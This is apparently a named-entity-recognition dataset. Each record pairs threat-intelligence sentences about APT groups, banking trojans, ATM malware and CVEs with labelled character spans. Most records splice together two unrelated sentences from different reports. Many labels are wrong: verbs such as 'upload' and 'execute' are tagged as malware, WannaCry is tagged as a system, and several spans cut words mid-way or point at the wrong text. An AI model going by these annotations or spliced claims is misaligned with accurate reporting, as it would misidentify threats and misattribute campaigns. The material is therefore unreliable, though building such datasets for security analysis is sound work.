{"text": "Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . Tweety Chat 's Android version can record audio , too .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 111, "end": 124, "label": "Malware"}, {"start": 155, "end": 167, "label": "Malware"}, {"start": 302, "end": 313, "label": "Malware"}, {"start": 317, "end": 324, "label": "System"}]}
{"text": "This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's .", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 80, "end": 94, "label": "Malware"}, {"start": 130, "end": 156, "label": "Malware"}, {"start": 159, "end": 170, "label": "Malware"}, {"start": 355, "end": 364, "label": "Organization"}]}
{"text": "In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": [{"start": 23, "end": 32, "label": "Malware"}, {"start": 69, "end": 79, "label": "Malware"}, {"start": 125, "end": 134, "label": "Organization"}, {"start": 164, "end": 171, "label": "Vulnerability"}, {"start": 304, "end": 317, "label": "Vulnerability"}, {"start": 322, "end": 336, "label": "Vulnerability"}]}
{"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d . Back in February , we noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 15, "end": 21, "label": "Malware"}, {"start": 47, "end": 54, "label": "Malware"}, {"start": 286, "end": 295, "label": "Organization"}, {"start": 300, "end": 316, "label": "Organization"}]}
{"text": "The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 39, "end": 49, "label": "Malware"}, {"start": 155, "end": 166, "label": "Organization"}, {"start": 202, "end": 211, "label": "Organization"}, {"start": 216, "end": 232, "label": "Organization"}]}
{"text": "The malware starts communicating with the C&C server by sending basic information about the infected machine . One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 19, "end": 45, "label": "Malware"}, {"start": 138, "end": 149, "label": "Malware"}]}
{"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 40, "end": 54, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}]}
{"text": "After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . During their previous campaign , we found Confucius using fake romance websites to entice victims into installing malicious Android applications .", "spans": [{"start": 34, "end": 45, "label": "Malware"}, {"start": 134, "end": 141, "label": "Malware"}, {"start": 349, "end": 356, "label": "System"}]}
{"text": "This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . Periodically , the malware tries to contact the command-and-control ( C&C ) server with the username encoded into parameters .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 65, "end": 89, "label": "Malware"}, {"start": 92, "end": 98, "label": "Malware"}, {"start": 101, "end": 107, "label": "Malware"}, {"start": 110, "end": 123, "label": "Malware"}, {"start": 128, "end": 142, "label": "Malware"}, {"start": 193, "end": 212, "label": "System"}, {"start": 215, "end": 218, "label": "System"}]}
{"text": "It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper .", "spans": [{"start": 18, "end": 31, "label": "Malware"}, {"start": 60, "end": 71, "label": "Malware"}, {"start": 163, "end": 169, "label": "Malware"}, {"start": 174, "end": 187, "label": "Malware"}]}
{"text": "With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . This algorithm was previously discussed by security researchers in a Confucius-related blog post .", "spans": [{"start": 24, "end": 35, "label": "Malware"}, {"start": 41, "end": 45, "label": "Malware"}]}
{"text": "By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": [{"start": 3, "end": 22, "label": "Malware"}, {"start": 25, "end": 36, "label": "Malware"}, {"start": 48, "end": 65, "label": "Malware"}, {"start": 118, "end": 127, "label": "Organization"}, {"start": 154, "end": 163, "label": "Indicator"}, {"start": 175, "end": 188, "label": "Vulnerability"}]}
{"text": "To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . The group still uses the Badnews malware , a backdoor with information-stealing and file-executing capabilities , albeit updated with a slight modification in the encryption routine at the end of 2017 , when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost .", "spans": [{"start": 50, "end": 61, "label": "Malware"}, {"start": 84, "end": 91, "label": "Malware"}, {"start": 96, "end": 123, "label": "Malware"}, {"start": 131, "end": 137, "label": "Malware"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 193, "end": 200, "label": "Malware"}, {"start": 457, "end": 466, "label": "Organization"}]}
{"text": "Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions \u2014 which are often not designed to handle the persistent and sophisticated threats detailed in this blog \u2014 ineffective .", "spans": [{"start": 37, "end": 45, "label": "Malware"}, {"start": 57, "end": 67, "label": "Malware"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}]}
{"text": "The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks .", "spans": [{"start": 21, "end": 30, "label": "Malware"}, {"start": 49, "end": 67, "label": "Malware"}, {"start": 90, "end": 107, "label": "Malware"}, {"start": 170, "end": 184, "label": "Organization"}]}
{"text": "The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . Patchwork uses email as an entry point , which is why securing the email gateACT is important .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 61, "end": 67, "label": "Malware"}, {"start": 70, "end": 78, "label": "Malware"}, {"start": 83, "end": 96, "label": "Malware"}, {"start": 99, "end": 125, "label": "Malware"}, {"start": 128, "end": 137, "label": "Organization"}]}
{"text": "The PowerShell version of the Trojan also has the ability to get screenshots . This blog post examines two similar malware families that utilize the aforementioned technique to abuse legitimate websites , their connections to each other , and their connections to known espionage campaigns .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 61, "end": 64, "label": "Malware"}, {"start": 65, "end": 76, "label": "Malware"}]}
{"text": "Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . In order to increase the likelihood of their malware successfully communicating home , Cyber Espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 174, "end": 196, "label": "Malware"}]}
{"text": "BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . In 2013 , Rapid7 reported on a series of relatively amateur attacks against Pakistani targets .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 43, "end": 50, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 246, "end": 252, "label": "Organization"}]}
{"text": "The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 17, "end": 24, "label": "Malware"}, {"start": 132, "end": 143, "label": "Indicator"}, {"start": 262, "end": 268, "label": "Malware"}, {"start": 275, "end": 286, "label": "Malware"}, {"start": 307, "end": 313, "label": "Organization"}]}
{"text": "China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 36, "end": 45, "label": "Organization"}, {"start": 58, "end": 65, "label": "Malware"}, {"start": 190, "end": 201, "label": "Indicator"}, {"start": 224, "end": 235, "label": "Indicator"}, {"start": 274, "end": 290, "label": "Malware"}]}
{"text": "China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 93, "end": 100, "label": "Malware"}, {"start": 138, "end": 149, "label": "Indicator"}, {"start": 213, "end": 235, "label": "System"}, {"start": 238, "end": 242, "label": "System"}]}
{"text": "The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 9, "end": 21, "label": "Malware"}, {"start": 282, "end": 300, "label": "Malware"}, {"start": 309, "end": 320, "label": "Indicator"}, {"start": 342, "end": 350, "label": "Malware"}]}
{"text": "Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": [{"start": 31, "end": 48, "label": "Malware"}, {"start": 61, "end": 69, "label": "Malware"}, {"start": 74, "end": 92, "label": "Malware"}, {"start": 132, "end": 139, "label": "Malware"}, {"start": 295, "end": 314, "label": "Organization"}, {"start": 329, "end": 340, "label": "Indicator"}, {"start": 345, "end": 356, "label": "Indicator"}]}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . In this blog post , we discussed two separate malware variations that behave in very similar ACTs and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 243, "end": 245, "label": "System"}]}
{"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio .", "spans": [{"start": 4, "end": 20, "label": "Malware"}, {"start": 50, "end": 63, "label": "Malware"}, {"start": 97, "end": 112, "label": "Indicator"}]}
{"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": [{"start": 15, "end": 22, "label": "Malware"}, {"start": 36, "end": 49, "label": "Malware"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 125, "end": 132, "label": "Malware"}, {"start": 150, "end": 170, "label": "Malware"}, {"start": 255, "end": 268, "label": "Vulnerability"}, {"start": 273, "end": 287, "label": "Vulnerability"}]}
{"text": "They also download apks secretly and record audios and videos , then upload users\u2019 privacy information to server , causing users\u2019 privacy leakage . We dove deeper into Confucius' operations\u2014namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 10, "end": 18, "label": "Malware"}, {"start": 24, "end": 32, "label": "Malware"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 69, "end": 75, "label": "Malware"}]}
{"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 18, "end": 37, "label": "Malware"}, {"start": 256, "end": 271, "label": "Malware"}, {"start": 325, "end": 338, "label": "Vulnerability"}]}
{"text": "AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": [{"start": 8, "end": 29, "label": "Malware"}, {"start": 30, "end": 40, "label": "System"}, {"start": 45, "end": 55, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 190, "end": 197, "label": "Vulnerability"}, {"start": 198, "end": 211, "label": "Vulnerability"}, {"start": 242, "end": 258, "label": "System"}, {"start": 261, "end": 264, "label": "System"}, {"start": 291, "end": 303, "label": "System"}, {"start": 306, "end": 309, "label": "System"}, {"start": 394, "end": 403, "label": "Indicator"}]}
{"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 174, "end": 180, "label": "Malware"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 191, "end": 197, "label": "Malware"}]}
{"text": "The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . Corkow provided remote access to the ITS-Broker system terminal by \u300a Platforma soft \u300b Ltd. , which enabled the fraud to be committed .", "spans": [{"start": 4, "end": 11, "label": "Vulnerability"}, {"start": 21, "end": 30, "label": "Organization"}, {"start": 52, "end": 70, "label": "Malware"}, {"start": 102, "end": 108, "label": "Malware"}]}
{"text": "As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": [{"start": 19, "end": 27, "label": "Organization"}, {"start": 62, "end": 69, "label": "Organization"}, {"start": 96, "end": 118, "label": "Malware"}, {"start": 203, "end": 221, "label": "Indicator"}, {"start": 296, "end": 318, "label": "Organization"}]}
{"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . The interest among hackers in targeting trading systems is expected to grow .", "spans": [{"start": 17, "end": 35, "label": "Malware"}, {"start": 42, "end": 49, "label": "Malware"}]}
{"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . Russian-speaking hackers are believed to be responsible for these attacks and used the Corkow Trojan .", "spans": [{"start": 0, "end": 18, "label": "Malware"}, {"start": 59, "end": 67, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 128, "end": 145, "label": "Malware"}, {"start": 182, "end": 197, "label": "Malware"}, {"start": 322, "end": 335, "label": "Malware"}]}
{"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 90, "end": 115, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 133, "end": 152, "label": "Malware"}, {"start": 155, "end": 172, "label": "Malware"}, {"start": 175, "end": 198, "label": "Malware"}, {"start": 225, "end": 244, "label": "Organization"}]}
{"text": "A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 .", "spans": [{"start": 110, "end": 118, "label": "Malware"}, {"start": 128, "end": 157, "label": "Malware"}, {"start": 160, "end": 169, "label": "Malware"}, {"start": 174, "end": 185, "label": "Malware"}, {"start": 201, "end": 210, "label": "Malware"}, {"start": 316, "end": 320, "label": "Malware"}, {"start": 327, "end": 334, "label": "Malware"}]}
{"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 43, "end": 48, "label": "Malware"}, {"start": 154, "end": 162, "label": "Organization"}, {"start": 217, "end": 223, "label": "Malware"}]}
{"text": "The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . Hackers gained access to a computer in the trading system in September 2014 .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 149, "end": 159, "label": "Malware"}]}
{"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less\u201d aspect of this method . Starting in December 2014 , the criminal group began running keyloggers in the infected system .", "spans": [{"start": 8, "end": 15, "label": "Malware"}, {"start": 27, "end": 34, "label": "Malware"}, {"start": 186, "end": 196, "label": "Malware"}]}
{"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 53, "end": 61, "label": "Malware"}, {"start": 173, "end": 176, "label": "Malware"}]}
{"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 79, "end": 98, "label": "Malware"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 120, "end": 128, "label": "Organization"}, {"start": 196, "end": 202, "label": "Malware"}, {"start": 205, "end": 227, "label": "Malware"}, {"start": 230, "end": 242, "label": "Malware"}, {"start": 245, "end": 261, "label": "Malware"}, {"start": 264, "end": 291, "label": "Malware"}, {"start": 294, "end": 307, "label": "Malware"}]}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 113, "end": 131, "label": "Vulnerability"}, {"start": 153, "end": 165, "label": "Vulnerability"}]}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 86, "end": 94, "label": "Organization"}, {"start": 144, "end": 166, "label": "Organization"}, {"start": 216, "end": 222, "label": "Malware"}, {"start": 223, "end": 230, "label": "Malware"}]}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis .", "spans": [{"start": 18, "end": 27, "label": "Malware"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 102, "end": 108, "label": "Malware"}]}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 189, "end": 195, "label": "Malware"}, {"start": 214, "end": 219, "label": "Organization"}]}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 224, "end": 230, "label": "Malware"}]}
{"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak trojan . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": [{"start": 76, "end": 84, "label": "Malware"}, {"start": 102, "end": 114, "label": "Malware"}, {"start": 117, "end": 124, "label": "Malware"}, {"start": 189, "end": 195, "label": "Malware"}]}
{"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 7, "end": 29, "label": "Malware"}, {"start": 185, "end": 192, "label": "System"}, {"start": 193, "end": 200, "label": "Vulnerability"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 281, "end": 283, "label": "Indicator"}]}
{"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 19, "label": "Malware"}, {"start": 77, "end": 88, "label": "Organization"}, {"start": 98, "end": 128, "label": "Malware"}, {"start": 173, "end": 187, "label": "Malware"}, {"start": 207, "end": 224, "label": "Malware"}, {"start": 255, "end": 258, "label": "System"}, {"start": 261, "end": 286, "label": "System"}]}
{"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 35, "end": 71, "label": "Malware"}, {"start": 76, "end": 105, "label": "Malware"}, {"start": 140, "end": 143, "label": "Indicator"}]}
{"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA .", "spans": [{"start": 43, "end": 48, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 201, "end": 211, "label": "Malware"}, {"start": 223, "end": 229, "label": "Malware"}, {"start": 300, "end": 307, "label": "System"}]}
{"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . Hackers used the remote access to detect servers of their interest in the internal network .", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 84, "end": 94, "label": "Malware"}, {"start": 156, "end": 171, "label": "Malware"}]}
{"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform . In 2015 , the Metel gang began to target banks and financial institutions directly .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 85, "end": 94, "label": "Malware"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 211, "end": 233, "label": "Organization"}]}
{"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services .", "spans": [{"start": 29, "end": 44, "label": "Malware"}, {"start": 45, "end": 65, "label": "Malware"}, {"start": 148, "end": 177, "label": "Malware"}, {"start": 251, "end": 256, "label": "Malware"}, {"start": 262, "end": 269, "label": "Organization"}, {"start": 270, "end": 276, "label": "Malware"}, {"start": 293, "end": 299, "label": "Malware"}]}
{"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 47, "end": 52, "label": "Malware"}, {"start": 65, "end": 100, "label": "Malware"}]}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . With this level of access , the gang has been able to pull off a clever trick by automating the rollback of ATM transactions .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}]}
{"text": "To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . COVELLITE operates globally with targets primarily in Europe , East Asia , and North America .", "spans": [{"start": 54, "end": 68, "label": "Malware"}, {"start": 127, "end": 156, "label": "Malware"}]}
{"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies .", "spans": [{"start": 28, "end": 41, "label": "System"}, {"start": 125, "end": 148, "label": "Malware"}, {"start": 179, "end": 202, "label": "Malware"}, {"start": 227, "end": 249, "label": "System"}, {"start": 355, "end": 373, "label": "Organization"}]}
{"text": "The HTA files contained job descriptions and links to job postings on popular employment websites . LAZARUS GROUP is responsible for attacks ranging from the 2014 attack on Sony Pictures to a number of Bitcoin heists in 2017 .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 14, "end": 50, "label": "Malware"}, {"start": 173, "end": 186, "label": "Organization"}, {"start": 202, "end": 209, "label": "System"}]}
{"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 46, "end": 63, "label": "Organization"}, {"start": 105, "end": 134, "label": "Malware"}, {"start": 237, "end": 246, "label": "Malware"}, {"start": 247, "end": 254, "label": "Malware"}, {"start": 289, "end": 305, "label": "Malware"}]}
{"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia .", "spans": [{"start": 29, "end": 46, "label": "System"}, {"start": 66, "end": 84, "label": "Malware"}, {"start": 93, "end": 105, "label": "System"}, {"start": 110, "end": 128, "label": "Malware"}, {"start": 131, "end": 154, "label": "Malware"}, {"start": 157, "end": 177, "label": "Malware"}, {"start": 188, "end": 235, "label": "Malware"}, {"start": 238, "end": 249, "label": "Malware"}]}
{"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry .", "spans": [{"start": 60, "end": 83, "label": "Malware"}, {"start": 171, "end": 200, "label": "Malware"}, {"start": 342, "end": 348, "label": "Organization"}, {"start": 394, "end": 406, "label": "Organization"}]}
{"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": [{"start": 65, "end": 71, "label": "Organization"}, {"start": 79, "end": 107, "label": "Malware"}, {"start": 283, "end": 307, "label": "Malware"}, {"start": 312, "end": 334, "label": "Malware"}]}
{"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell .", "spans": [{"start": 36, "end": 51, "label": "System"}, {"start": 54, "end": 66, "label": "Malware"}, {"start": 119, "end": 160, "label": "Malware"}, {"start": 163, "end": 170, "label": "Organization"}, {"start": 238, "end": 248, "label": "Malware"}]}
